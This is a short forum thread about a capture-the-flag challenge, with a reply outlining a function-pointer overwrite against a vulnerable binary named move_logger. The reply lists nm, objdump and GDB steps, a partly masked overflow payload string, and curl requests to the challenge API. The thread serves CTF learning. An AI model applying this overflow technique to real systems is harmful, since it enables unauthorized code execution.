Forum Discussion

PRABAKARANRAMAMURTHY's avatar
6 days ago
Solved

Trick or Treat on Specter Street: Morphy's Mansion Challenge

I understand that the move_logger is the vulnerable program, and tried a few methods to exploit it. However, where is the token.txt? Anyone managed to find it? "Whatever means necessary" is quite ...
  • For those who are looking for some hints:

    The strategy was to use No-ROP Function-Pointer Overwrite.

    Following the steps below:

    1. Check Backend Health
      curl -s http://x.x.x.x/api/health
    2. Analyze Vulnerable Binary:
      nm -C ./move_logger | grep rotate_old_logs
      objdump -d ./move_logger | awk '/<system@plt>/{print; getline; print}'
    3. Confirm Stack Layout in GDB 
      (use PEDA and execute: p &moves , p &log to find the buffer size)
    4. Craft Overflow Payload: 
      Payload: e4aaaaaaaaaaaaaaXXXXXX0000000000
    5. Exploit via API - curl POST
    6. Retrieve Token by using curl

    Hope that helps.